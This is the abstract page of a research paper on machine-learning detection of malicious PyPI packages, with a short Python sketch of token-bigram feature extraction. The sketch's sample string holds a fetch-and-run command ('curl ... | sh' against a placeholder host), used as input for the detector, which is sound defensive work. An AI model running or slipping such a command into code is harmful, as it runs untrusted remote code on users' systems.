S. A. Rakovsky, “Detecting malicious activity in open-source projects using machine learning methods”, Proceedings of ISP RAS, 2024, Volume 36, Issue 3, Pages 161

Detecting malicious activity in open-source projects using machine learning methods

S. A. Rakovsky

MIREA — Russian Technological University, Moscow

Abstract: The Python Package Index (PyPI) is the primary repository of projects for the Python programming language, and the package manager pip uses it by default. PyPI is a free and open-source platform: anyone can register an account on PyPI and publish a project, as well as examine the source code of existing projects if necessary. The platform does not vet projects published by users, though a malicious project can be reported by e-mail. Nonetheless, analysts discover new malicious packages on PyPI at intervals of less than a month. Organizations working in the field of open repository security vigilantly monitor emerging projects. Unfortunately, this is not enough: some malicious projects are detected and removed only several months after publication. This paper proposes an automatic feature selection algorithm based on bigrams and code properties, and trains an ET classifier capable of reliably identifying certain types of malicious logic in code. The malicious code repositories MalRegistry and DataDog were used as the training sample. After training, the model was tested on the three latest releases of all existing projects on PyPI, and it detected 28 previously undiscovered malicious projects, the oldest of which had been available for almost a year and a half. The approach used in this work also allows for real-time scanning of published projects, which can be used for prompt detection of malicious activity. This work places additional emphasis on methods that do not require an expert for feature selection and control, thereby reducing the burden on human resources.
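
To illustrate what bigram-based features could look like, the following minimal sketch counts adjacent token pairs in Python source text using the standard `tokenize` module. It rests on assumptions not stated in the abstract: that the bigrams are taken over lexical tokens, and that literals are collapsed to placeholders. The function name `token_bigrams`, the `<STR>` and `<NUM>` placeholders, and the sample input are hypothetical and are not the paper's feature extraction.

```python
import io
import tokenize
from collections import Counter

# Token types skipped in this illustration (layout and comments only).
_SKIP = {
    tokenize.COMMENT, tokenize.NL, tokenize.NEWLINE,
    tokenize.INDENT, tokenize.DEDENT, tokenize.ENCODING, tokenize.ENDMARKER,
}


def token_bigrams(source: str) -> Counter:
    """Count adjacent token pairs in Python source text (hypothetical helper)."""
    tokens = []
    for tok in tokenize.generate_tokens(io.StringIO(source).readline):
        if tok.type in _SKIP:
            continue
        # Assumption: collapse literals so bigrams reflect code structure,
        # not specific string or numeric values.
        if tok.type == tokenize.STRING:
            tokens.append("<STR>")
        elif tok.type == tokenize.NUMBER:
            tokens.append("<NUM>")
        else:
            tokens.append(tok.string)
    # Pair each token with its successor and count the pairs.
    return Counter(zip(tokens, tokens[1:]))


# Hypothetical sample: a shell command executed from Python code.
sample = "import os\nos.system('curl http://example.invalid | sh')\n"
counts = token_bigrams(sample)
```

Counts of this kind could be arranged into a fixed-length vector and passed to a tree-based classifier; which bigrams to keep is the feature selection question the abstract refers to.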

Keywords: pypi, malware detection, open-source security, open-source

Language: English

DOI: 10.15514/ISPRAS-2024-36(3)-11